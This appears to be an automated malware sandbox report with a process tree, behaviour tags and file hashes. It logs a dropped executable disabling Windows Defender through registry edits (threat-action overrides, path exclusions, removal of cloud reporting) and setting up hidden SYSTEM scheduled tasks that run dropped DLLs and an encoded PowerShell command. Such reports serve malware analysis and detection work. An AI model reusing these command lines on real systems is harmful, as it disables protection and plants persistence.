C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\GfPyGdpxFACRQsJ\VOqDozH.exe  [PID 3360]
  cmd: C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\GfPyGdpxFACRQsJ\VOqDozH.exe vN /site_id 525403 /S
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [PID 3912]
      cmd: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe  [PID 4596]
          cmd: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
          - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\reg.exe  [PID 1712]
              cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 3996]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 1360]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 2180]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 1444]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 2236]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 4588]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 4468]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 2452]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 2840]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 4604]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 2724]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 4992]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 4224]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 520]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 5032]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 1208]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 3176]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 3552]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 4800]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 2412]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
        C:\Windows\SysWOW64\reg.exe  [PID 4656]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
        C:\Windows\SysWOW64\reg.exe  [PID 524]
          cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4896
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VMeMEPztOsUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VMeMEPztOsUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VpeeuBoLdsfCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VpeeuBoLdsfCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mMQoIZnNGNdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mMQoIZnNGNdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgLqjNPWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgLqjNPWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JVfpBtJrTNfNsQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JVfpBtJrTNfNsQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 
\"C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\pIYRwKxBaOzqikCb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\pIYRwKxBaOzqikCb\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMeMEPztOsUn" /t REG_DWORD /d 0 /reg:323⤵PID:3056
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMeMEPztOsUn" /t REG_DWORD /d 0 /reg:324⤵PID:3632
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMeMEPztOsUn" /t REG_DWORD /d 0 /reg:643⤵PID:1292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpeeuBoLdsfCC" /t REG_DWORD /d 0 /reg:323⤵PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpeeuBoLdsfCC" /t REG_DWORD /d 0 /reg:643⤵PID:1000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR" /t REG_DWORD /d 0 /reg:323⤵PID:4196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR" /t REG_DWORD /d 0 /reg:643⤵PID:8
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mMQoIZnNGNdU2" /t REG_DWORD /d 0 /reg:323⤵PID:2052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mMQoIZnNGNdU2" /t REG_DWORD /d 0 /reg:643⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgLqjNPWU" /t REG_DWORD /d 0 /reg:323⤵PID:4588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgLqjNPWU" /t REG_DWORD /d 0 /reg:643⤵PID:2824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JVfpBtJrTNfNsQVB /t REG_DWORD /d 0 /reg:323⤵PID:5040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JVfpBtJrTNfNsQVB /t REG_DWORD /d 0 /reg:643⤵PID:3092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq /t REG_DWORD /d 0 /reg:323⤵PID:3252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq /t REG_DWORD /d 0 /reg:643⤵PID:3004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\pIYRwKxBaOzqikCb /t REG_DWORD /d 0 /reg:323⤵PID:520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\pIYRwKxBaOzqikCb /t REG_DWORD /d 0 /reg:643⤵PID:3688
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUvcQasXV" /SC once /ST 01:23:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUvcQasXV"2⤵PID:616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUvcQasXV"2⤵PID:1692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CeimXGcICqHikUZiG" /SC once /ST 03:40:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\pIYRwKxBaOzqikCb\TMXdAXJyTNtvwTc\IPWdkTc.exe\" aV /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CeimXGcICqHikUZiG"2⤵PID:4224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1144
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2376
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1672
-
C:\Windows\Temp\pIYRwKxBaOzqikCb\TMXdAXJyTNtvwTc\IPWdkTc.exeC:\Windows\Temp\pIYRwKxBaOzqikCb\TMXdAXJyTNtvwTc\IPWdkTc.exe aV /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4672 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bVPnZmTmfBquXJeKIT"2⤵PID:3436
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4632
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3580
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3932
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\mgLqjNPWU\xlUxoh.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "UQjVtDzLrufMISZ" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UQjVtDzLrufMISZ2" /F /xml "C:\Program Files (x86)\mgLqjNPWU\ducyvKD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UQjVtDzLrufMISZ"2⤵PID:224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UQjVtDzLrufMISZ"2⤵PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xeEdlWwvgDggxE" /F /xml "C:\Program Files (x86)\mMQoIZnNGNdU2\dUhjECQ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HbWXyotuKGwUi2" /F /xml "C:\ProgramData\JVfpBtJrTNfNsQVB\DNbRORs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KNgpXyLxjztSEzXEY2" /F /xml "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\pJwbNMt.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ldzZDPvmezBaAizzQJS2" /F /xml "C:\Program Files (x86)\VpeeuBoLdsfCC\dJNhyRi.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rTRcbUUPNNGcKFAGn" /SC once /ST 00:22:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\pIYRwKxBaOzqikCb\PiUDbzhg\NNzRGCf.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "rTRcbUUPNNGcKFAGn"2⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4960
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:752
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2412
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CeimXGcICqHikUZiG"2⤵PID:4204
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\pIYRwKxBaOzqikCb\PiUDbzhg\NNzRGCf.dll",#1 /site_id 5254031⤵PID:3092
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\pIYRwKxBaOzqikCb\PiUDbzhg\NNzRGCf.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4992 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rTRcbUUPNNGcKFAGn"3⤵PID:1688
-
-
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 2KB
  MD5: c5dd0a7bef7b9eb97e2600c016ef4a4a
  SHA1: 6aac10e61efe2d4023de10b00f2419b506e71f4c
  SHA256: b24a5167f051f041f9053321bbc634eed59b6cb8d81cdf7f78722a6bc702f292
  SHA512: 6102a3d750682a8a26841c107dd844b36379134f4f8d8b4827decaa3cac927cf83da51b1cc245e541222f010c839ecb8c77aa8bf5d45d4924f15321847711f41

- Filesize: 2KB
  MD5: b67d29fbc9dcabff26873eb725e59550
  SHA1: 70e29216a6d48f294c09d3c961e979b86a595250
  SHA256: 2d6543328da99f9001be37a1dfdc5f75afe3cfeda7173b0d34ab662f4254c666
  SHA512: f1ec6bdf054cb12fbae66fc20b837caac4df39d31a957618289a5b5003e6637ef0dd56899835aee86a716edf4cf533b3db341f31401dad05886d6cb3dcd474a1

- Filesize: 2KB
  MD5: 1833ca5233f21c9f99b504077234d2af
  SHA1: 96bf85363f5a7000f408af0c46999d318df1a35b
  SHA256: ad28ab57fd43a285022787359c969f13671a9f9f17215a68cf19f377c23b4532
  SHA512: 6a18809f0bb2519d00d394387c8061d718322340e11135378a5e2525d4305ba0931dc3507cdcf718e0e6b470bc6621aa03ca4e55d864e834929b607f4f1837b5

- Filesize: 2KB
  MD5: 14f445568f2a05af65df1871be2bfbe7
  SHA1: eb87b7f83d9c79a32fb849cfa09599c916f03665
  SHA256: f722cb7535dc52a023df58eca51bb1b8bfb5cef9a615936c23e4341cca2473d6
  SHA512: 4bd0c0a3666461431a8937a6e099c67b797872932583c86c0cd487644cb9318d8456371f93035c71442fa8856b1584b4f33aea0b9d5a21c2ab1e91e0efa809a6

- Filesize: 2KB
  MD5: 555e1798aea77bf09641e539a5f23d0e
  SHA1: 81b84ec866e2fa859fb5bca78ebc7493f8490eda
  SHA256: 6280dc3d88bee38ea6b710806d98e65de8aad5cd6c72b869549735aac4823e0f
  SHA512: 52b1084ebb1c22f1755ab1b9e04011a9956d621e0e86623eb803256d30a358fed0abadee27de950931573bab49e0acb18bc855772765b2faf257ebacabc92d30

- Filesize: 2KB
  MD5: 6cf293cb4d80be23433eecf74ddb5503
  SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
  SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

- Filesize: 64B
  MD5: d8b9a260789a22d72263ef3bb119108c
  SHA1: 376a9bd48726f422679f2cd65003442c0b6f6dd5
